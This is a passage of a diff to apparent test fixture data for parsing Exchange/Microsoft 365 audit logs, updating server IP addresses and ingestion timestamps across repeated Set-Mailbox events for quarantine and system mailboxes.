bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853140400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2771,12 +2771,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2819,7 +2819,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -2831,8 +2831,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177665100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853145400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2852,12 +2852,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2900,7 +2900,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -2912,8 +2912,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177667900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853151200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -2933,12 +2933,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2981,7 +2981,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -2993,8 +2993,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177670700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853155300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -3014,12 +3014,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3062,7 +3062,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3074,8 +3074,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177673300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853159300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -3095,12 +3095,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3140,7 +3140,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3152,8 +3152,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177676Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853162700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 